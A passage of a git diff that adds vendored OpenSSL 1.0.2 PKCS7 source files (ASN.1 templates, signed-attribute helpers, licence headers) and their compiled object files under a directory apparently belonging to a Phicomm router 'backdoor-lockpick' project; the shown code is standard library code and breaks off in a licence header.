+        ASN1_SIMPLE(PKCS7_SIGN_ENVELOPE, enc_data, PKCS7_ENC_CONTENT),
+        ASN1_IMP_SET_OF_OPT(PKCS7_SIGN_ENVELOPE, cert, X509, 0),
+        ASN1_IMP_SET_OF_OPT(PKCS7_SIGN_ENVELOPE, crl, X509_CRL, 1),
+        ASN1_SET_OF(PKCS7_SIGN_ENVELOPE, signer_info, PKCS7_SIGNER_INFO)
+} ASN1_NDEF_SEQUENCE_END(PKCS7_SIGN_ENVELOPE)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS7_SIGN_ENVELOPE)
+
+ASN1_NDEF_SEQUENCE(PKCS7_ENCRYPT) = {
+        ASN1_SIMPLE(PKCS7_ENCRYPT, version, ASN1_INTEGER),
+        ASN1_SIMPLE(PKCS7_ENCRYPT, enc_data, PKCS7_ENC_CONTENT)
+} ASN1_NDEF_SEQUENCE_END(PKCS7_ENCRYPT)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS7_ENCRYPT)
+
+ASN1_NDEF_SEQUENCE(PKCS7_DIGEST) = {
+        ASN1_SIMPLE(PKCS7_DIGEST, version, ASN1_INTEGER),
+        ASN1_SIMPLE(PKCS7_DIGEST, md, X509_ALGOR),
+        ASN1_SIMPLE(PKCS7_DIGEST, contents, PKCS7),
+        ASN1_SIMPLE(PKCS7_DIGEST, digest, ASN1_OCTET_STRING)
+} ASN1_NDEF_SEQUENCE_END(PKCS7_DIGEST)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS7_DIGEST)
+
+/* Specials for authenticated attributes */
+
+/*
+ * When signing attributes we want to reorder them to match the sorted
+ * encoding.
+ */
+
+ASN1_ITEM_TEMPLATE(PKCS7_ATTR_SIGN) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SET_ORDER, 0, PKCS7_ATTRIBUTES, X509_ATTRIBUTE)
+ASN1_ITEM_TEMPLATE_END(PKCS7_ATTR_SIGN)
+
+/*
+ * When verifying attributes we need to use the received order. So we use
+ * SEQUENCE OF and tag it to SET OF
+ */
+
+ASN1_ITEM_TEMPLATE(PKCS7_ATTR_VERIFY) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF | ASN1_TFLG_IMPTAG | ASN1_TFLG_UNIVERSAL,
+                                V_ASN1_SET, PKCS7_ATTRIBUTES, X509_ATTRIBUTE)
+ASN1_ITEM_TEMPLATE_END(PKCS7_ATTR_VERIFY)
+
+IMPLEMENT_ASN1_PRINT_FUNCTION(PKCS7)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_asn1.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_asn1.o
new file mode 100644
index 0000000000000000000000000000000000000000..fe8b00b29b7a95ed6cb9e9dbdcedd7e5d5d94441
GIT binary patch
literal 17920
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
II&W(K8Sm_t5dZ)H

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_attr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_attr.c
new file mode 100644
index 0000000..88922ef
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_attr.c
@@ -0,0 +1,165 @@
+/* pk7_attr.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/bio.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/pem.h>
+#include <openssl/pkcs7.h>
+#include <openssl/x509.h>
+#include <openssl/err.h>
+
+int PKCS7_add_attrib_smimecap(PKCS7_SIGNER_INFO *si,
+                              STACK_OF(X509_ALGOR) *cap)
+{
+    ASN1_STRING *seq;
+    if (!(seq = ASN1_STRING_new())) {
+        PKCS7err(PKCS7_F_PKCS7_ADD_ATTRIB_SMIMECAP, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    seq->length = ASN1_item_i2d((ASN1_VALUE *)cap, &seq->data,
+                                ASN1_ITEM_rptr(X509_ALGORS));
+    return PKCS7_add_signed_attribute(si, NID_SMIMECapabilities,
+                                      V_ASN1_SEQUENCE, seq);
+}
+
+STACK_OF(X509_ALGOR) *PKCS7_get_smimecap(PKCS7_SIGNER_INFO *si)
+{
+    ASN1_TYPE *cap;
+    const unsigned char *p;
+
+    cap = PKCS7_get_signed_attribute(si, NID_SMIMECapabilities);
+    if (!cap || (cap->type != V_ASN1_SEQUENCE))
+        return NULL;
+    p = cap->value.sequence->data;
+    return (STACK_OF(X509_ALGOR) *)
+        ASN1_item_d2i(NULL, &p, cap->value.sequence->length,
+                      ASN1_ITEM_rptr(X509_ALGORS));
+}
+
+/* Basic smime-capabilities OID and optional integer arg */
+int PKCS7_simple_smimecap(STACK_OF(X509_ALGOR) *sk, int nid, int arg)
+{
+    X509_ALGOR *alg;
+
+    if (!(alg = X509_ALGOR_new())) {
+        PKCS7err(PKCS7_F_PKCS7_SIMPLE_SMIMECAP, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    ASN1_OBJECT_free(alg->algorithm);
+    alg->algorithm = OBJ_nid2obj(nid);
+    if (arg > 0) {
+        ASN1_INTEGER *nbit;
+        if (!(alg->parameter = ASN1_TYPE_new())) {
+            PKCS7err(PKCS7_F_PKCS7_SIMPLE_SMIMECAP, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        if (!(nbit = ASN1_INTEGER_new())) {
+            PKCS7err(PKCS7_F_PKCS7_SIMPLE_SMIMECAP, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        if (!ASN1_INTEGER_set(nbit, arg)) {
+            PKCS7err(PKCS7_F_PKCS7_SIMPLE_SMIMECAP, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        alg->parameter->value.integer = nbit;
+        alg->parameter->type = V_ASN1_INTEGER;
+    }
+    sk_X509_ALGOR_push(sk, alg);
+    return 1;
+}
+
+int PKCS7_add_attrib_content_type(PKCS7_SIGNER_INFO *si, ASN1_OBJECT *coid)
+{
+    if (PKCS7_get_signed_attribute(si, NID_pkcs9_contentType))
+        return 0;
+    if (!coid)
+        coid = OBJ_nid2obj(NID_pkcs7_data);
+    return PKCS7_add_signed_attribute(si, NID_pkcs9_contentType,
+                                      V_ASN1_OBJECT, coid);
+}
+
+int PKCS7_add0_attrib_signing_time(PKCS7_SIGNER_INFO *si, ASN1_TIME *t)
+{
+    if (!t && !(t = X509_gmtime_adj(NULL, 0))) {
+        PKCS7err(PKCS7_F_PKCS7_ADD0_ATTRIB_SIGNING_TIME,
+                 ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    return PKCS7_add_signed_attribute(si, NID_pkcs9_signingTime,
+                                      V_ASN1_UTCTIME, t);
+}
+
+int PKCS7_add1_attrib_digest(PKCS7_SIGNER_INFO *si,
+                             const unsigned char *md, int mdlen)
+{
+    ASN1_OCTET_STRING *os;
+    os = ASN1_OCTET_STRING_new();
+    if (!os)
+        return 0;
+    if (!ASN1_STRING_set(os, md, mdlen)
+        || !PKCS7_add_signed_attribute(si, NID_pkcs9_messageDigest,
+                                       V_ASN1_OCTET_STRING, os)) {
+        ASN1_OCTET_STRING_free(os);
+        return 0;
+    }
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_attr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_attr.o
new file mode 100644
index 0000000000000000000000000000000000000000..5705a1f1ef69cbd119b8ef2d436ea41c6bc2e788
GIT binary patch
literal 4168
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
b+WsV-bHwi$(*K59_V3y8kD@b9oc8|!7k}wt

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_dgst.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_dgst.c
new file mode 100644
index 0000000..6b57f97
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_dgst.c
@@ -0,0 +1,65 @@
+/* crypto/pkcs7/pk7_dgst.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/rand.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include <openssl/pkcs7.h>
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_doit.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_doit.c
new file mode 100644
index 0000000..dd6f675
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_doit.c
@@ -0,0 +1,1221 @@
+/* crypto/pkcs7/pk7_doit.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
